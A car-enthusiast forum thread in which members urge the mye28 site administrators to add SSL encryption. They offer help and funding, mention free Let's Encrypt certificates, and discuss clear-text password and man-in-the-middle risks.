Encryption

[duggi]

I can't believe I've never noticed, but I did today and am concerned that mye28 isn't encrypted with an SSL certificate. Not trying to call anyone out, web security is hard, but considering how many sites are getting popped these days...I'm surprised it hasn't already been an issue. Is there any way I can help?

[SPF2006]

+1.

[tig]

Was discussed before: http://www.mye28.com/viewtopic.php?f=8&t=125208

There I wrote:

I can patch the server soon but from a quick reading it affects encrypted SSL data, which is not used by this forum.

Wow, I just noticed that the sign-in page does not use SSL.

This means that every user's password is SENT IN CLEAR TEXT when they enter it. This means that you should NEVER log in to mye28.com from wireless network that you are not 100% sure is secure (like a coffee shop) because it is likely that someone is sniffing the data and will see your password.

If you use that same password on other sites then all the hacker needs to know is your email address.

People using this forum should use extra care to use a UNIQUE password for this site from all other passwords they use.

Since the Heartbleed vulnerability gives attackers access to memory on the server it does not matter if SSL is actually in use or not. The test I pointed to above shows that the site is exploitable.

[duggi]

ok then. my offer for help is there if anyone wants it.

[tig]

Upcoming Chrome update will label HTTP sites ‘not secure’

https://www.engadget.com/2018/02/08/goo ... ure-label/

I, too, am willing to help however I can.

[duggi]

If it's a cost issue, https://letsencrypt.org is a fantastic [FREE] option. I do this stuff for a living, so really, I don't mind lending a hand. Mye28 has been an invaluable resource to me for over 10 years now...I'm honestly not sure I could've survived my 528e this long without this forum

If it is about money and/or time, I'm willing to foot those costs for the sake of this community. Sorry if I'm being pushy, it'd just be sad to see this forum suffer because some jacka** came along and saw everything was unencrypted.

[Justin_FL]

I'll look into this.

[danix]

Bump. I second what duggi said - letsencrypt is free, easy, and I can help. And I'm off this week...

[SPF2006]

Bump - any updates?

[SlickDizzy]

Any updates? I have been periodically getting notifications from my credit monitoring software that some very old forum account logins from other sites are being found on the dark web. There should really be some form of encryption on this site.

[danix]

+1. There's several offers for help here, and if the platform supports it, letsencrypt is free.
If it doesn't support it, I'm sure we'd chip in for a "real" cert.

[Spen]

Happy to contribute too. A ssl cert should be peanuts for us to collectively pay for and figure out what tls software is being used. I was a web and computer guy for 17 years professionally before I gave it up for a dirty wrench.

[SlickDizzy]

Will this ever be addressed?

[code]

I’ll throw my hat in the ring for help. We do SSLs on all of the sites we develop, it’s super important in the current state of the web.

[duggi]

I spent a few hours getting a proof of concept working...it's not hard: https://forum.duggi.net

[WVe28]

I do agree, the longer this site is completely unencrypted, the more vulnerable we all become. I'm sure there are many members who unknowingly use the same passwords for mye28 as they do for more "sensitive" sites. What do you need, Beamters? Benefactors of this site range from blue collar to millionaires to tech-giant executives. The internet is no longer a place where you can stand up a site and leave it for a decade. Let us know what is needed to secure it and I'm sure we can overcome any obstacles.

[Justin_FL]

I think it is probably time to update the site to a current hosting package, the one we are on is old and the backend management software is older (still supported) but lacking features like free SSL stores that are common now vs years ago. So I don't see getting the certificate in place until then, otherwise you have to do a bit of script and config file hacking to make them work which breaks Plesk. The current release has the ability to manage them just fine.

Maybe once this hurricane is away I'll talk with Jeremy about initiating the process.

And correct me if I'm wrong, but the risk here is a man in the middle attack, i.e. someone sniffing your Internet packets and getting the login info or your PMs.

[duggi]

I think it is probably time to update the site to a current hosting package, the one we are on is old and the backend management software is older (still supported) but lacking features like free SSL stores that are common now vs years ago. So I don't see getting the certificate in place until then, otherwise you have to do a bit of script and config file hacking to make them work which breaks Plesk. The current release has the ability to manage them just fine.

Maybe once this hurricane is away I'll talk with Jeremy about initiating the process.

And correct me if I'm wrong, but the risk here is a man in the middle attack, i.e. someone sniffing your Internet packets and getting the login info or your PMs.

Thanks for the thoughtful reply, totally fair. Please feel free to reach out if you need extra technical hands or a little $$ to make it easier.

And yes, the risk is down to a man-in-the-middle stealing user credentials. It's the common practice of reusing credentials across multiple sites that puts the users here at risk, but the site itself has nothing important to "encrypt" or "hide" from the public. It would be sad though if mye28 was opportunistically hacked and taken-down by some rando "just because they could."